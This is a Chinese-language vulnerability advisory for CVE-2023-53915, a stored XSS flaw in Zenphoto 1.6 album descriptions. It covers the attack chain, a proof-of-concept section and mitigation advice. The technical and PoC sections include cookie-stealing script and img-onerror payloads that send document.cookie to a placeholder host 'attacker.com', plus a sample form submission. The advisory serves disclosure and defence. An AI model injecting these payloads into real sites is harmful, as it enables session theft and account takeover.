CVE-2023-53915 Zenphoto 1.6 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53915

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zenphoto 1.6

漏洞概述

CVE-2023-53915是Zenphoto 1.6版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞允许已认证的攻击者通过在相册描述字段中注入恶意HTML或JavaScript代码来实现持久化的XSS攻击。Zenphoto是一款开源的内容管理系统，主要用于创建和管理在线相册。由于漏洞存在于存储型输入点，恶意脚本会被永久保存在服务器端，当其他用户访问包含恶意内容的相册页面时，嵌入的iframe或script标签会自动执行，从而窃取用户会话cookie、劫持用户账户或执行其他恶意操作。此漏洞的CVSS评分为4.6，属于中等严重程度，攻击复杂度低但需要低权限认证和用户交互才能触发。漏洞影响Zenphoto的机密性和完整性，可导致敏感信息泄露和网站内容篡改。

技术细节

该存储型XSS漏洞源于Zenphoto 1.6对相册描述字段的输入验证和输出编码不充分。攻击者以低权限用户身份登录后，可访问相册创建或编辑功能，在描述字段中插入恶意代码，例如<iframe src=javascript:alert(document.cookie)>或<script>document.location='https://attacker.com/steal?c='+document.cookie</script>。由于应用程序未对用户输入进行严格的HTML过滤和字符转义，恶意代码被直接存储到数据库中。当其他用户（尤其是管理员）浏览该相册页面时，服务器从数据库取出未经过滤的内容并嵌入到HTML响应中，浏览器将其作为合法脚本执行。攻击者可利用此漏洞窃取受害者的会话令牌，以管理员身份进一步控制整个网站，甚至部署后门程序。漏洞的利用需要攻击者具有创建相册的权限，且需要诱导用户访问恶意页面才能触发。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的Zenphoto版本，确认版本为1.6且存在相册创建功能

STEP 2

获取访问权限

攻击者注册账户或使用已有低权限账户登录Zenphoto系统

STEP 3

注入恶意代码

攻击者创建新相册或在编辑现有相册时，在描述字段中插入XSS payload，如<script>或<iframe>标签

STEP 4

持久化存储

恶意代码被未经安全处理的输入验证直接存入数据库，形成持久化攻击点

STEP 5

诱导受害者访问

攻击者通过社交工程等方式诱导管理员或其他用户访问包含恶意代码的相册页面

STEP 6

脚本执行与数据窃取

受害者浏览器解析页面时执行恶意脚本，攻击者成功窃取会话cookie或执行其他恶意操作

STEP 7

账户劫持

攻击者利用窃取的会话令牌冒充受害者，进一步控制网站或提升权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53915 Stored XSS PoC for Zenphoto 1.6
// Steps to exploit:
// 1. Login to Zenphoto with low-privilege account
// 2. Navigate to Albums -> Create Album
// 3. In the album description field, inject the following payload:

// Payload 1: Cookie Stealer
const xssPayload1 = `<script>document.location='https://attacker.com/steal?c='+document.cookie</script>`;

// Payload 2: Iframe Injection
const xssPayload2 = `<iframe src="javascript:alert(document.cookie)">`;

// Payload 3: Event Handler
const xssPayload3 = `<img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">`;

// HTML Form Submission Example:
// <form action="https://target.com/zenphoto/zp-core/zp-extensions/album_xipe/theme-album-theme.php" method="POST">
//   <input type="hidden" name="album_name" value="Malicious Album">
//   <input type="hidden" name="album_desc" value="<script>fetch('https://attacker.com/steal?c='+btoa(document.cookie))</script>">
//   <input type="submit" value="Create Album">
// </form>

// When admin views the album, the XSS payload executes automatically
// Attacker receives victim's cookies/session tokens

影响范围

Zenphoto 1.6

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1)限制普通用户创建相册的权限，仅允许管理员操作；2)在Web应用防火墙(WAF)中配置XSS防护规则，拦截包含<script>、<iframe>等危险标签的请求；3)对相册描述等富文本字段启用HTML净化功能，使用DOMPurify等库清理用户输入；4)启用HttpOnly和Secure标志保护Cookie，防止JavaScript访问；5)加强用户权限管理，实施最小权限原则；6)监控日志及时发现异常请求模式。